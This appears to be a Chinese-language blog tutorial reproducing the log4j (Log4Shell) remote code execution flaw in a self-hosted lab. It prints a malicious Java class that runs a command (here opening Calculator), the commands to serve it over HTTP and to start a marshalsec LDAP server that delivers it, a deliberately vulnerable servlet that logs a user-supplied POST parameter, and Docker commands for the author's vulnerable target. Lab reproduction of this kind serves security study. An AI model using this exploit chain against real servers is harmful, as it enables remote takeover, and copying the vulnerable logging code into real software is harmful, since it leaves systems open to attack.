前言

昨天晚上朋友圈算是過了年了，一個log4j大伙都忙了起來，看著朋友圈好久沒這么熱鬧了。Apache 的這個log4j這個影響范圍的確是大，包括我自己做開發的時候也會用到log4j，這就很尷尬了。

大家也不要在公網上瘋狂測試了，我給大家帶來了漏洞靶場，攻擊視頻在下文，一步一步教你。

漏洞原理我改天會詳細的寫一篇文章出來，今天就主要是復現一下漏洞。

昨晚爆出的log4j rce 是通過lookup觸發的漏洞，但jdk1.8.191以上默認不支持ldap協議，對于高版本jdk,則需要一定的依賴。不過為了給大家最簡單的說明，我這里還是用jdk1.8.144的版本來運行。

這個漏洞和fastjson的漏洞利用如出一轍，首先需要編寫一個惡意類。

public class Exploit {
  public Exploit(){
    try{
      // 要執行的命令
      String[] commands = {"open", "/System/Applications/Calculator.app"};
      Process pc = Runtime.getRuntime().exec(commands);
      pc.waitFor();
   } catch(Exception e){
      e.printStackTrace();
   }
 }
  public static void main(String[] argv) {
    Exploit e = new Exploit();
 }
}

這里是彈出計算器

把這個類編譯之后會得到一個Exploit.class，然后需要在當前目錄下啟動一個web服務，

python3 -m http.server 8100

然后用marshalsec IDAP服務，項目地址：https://github.com/mbechler/marshalsec

java -cp /Users/fengxuan/Downloads/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8100/#Exploit"

漏洞類

package com.evalshell.webstudy;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import java.io.*;
import javax.servlet.ServletException;
import javax.servlet.http.*;
import javax.servlet.annotation.*;
@WebServlet(name = "helloServlet", value = "/hello-fengxuan")
public class HelloServlet extends HttpServlet {
  private String message;
  private static final Logger logger = LogManager.getLogger(HelloServlet.class);
  public void init() {
    message = "Hello World!";
 }
  public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {
    response.setContentType("text/html");
    response.setHeader("Content-Type", "text/html; charset=utf-8");
    System.out.println(request.getQueryString());
    // Hello
    PrintWriter out = response.getWriter();
    out.println("");
    out.println("你好，兄弟，請用post請求來搞我！");
    out.println("");
 }
  protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
    String name = req.getParameter("c");
    System.out.println(name);
    logger.error(name);
    resp.setContentType("text/html");
    resp.setHeader("Content-Type", "text/html; charset=utf-8");
    PrintWriter out = resp.getWriter();
    out.println("");
    out.println("
可惡！又被你裝到了！
");
    out.println("");
 }
  public void destroy() {
 }
}

最后運行

漏洞靶場

為了互聯網的安全，也為了給大家學習的環境，有很多同學不知道如何復現，我搭建了一個漏洞靶場，我編寫的docker-compose.yml

地址是：https://github.com/fengxuangit/log4j_vuln

或者直接運行命令

docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln 
docker exec -it log4j_vuln_container /bin/bash
/bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh

然后訪問你的8080的端口, 訪問 http://127.0.0.1:8080/webstudy/ 就可以了， post的參數為c

按照視頻教程玩就行。你的靶場你自己隨便玩！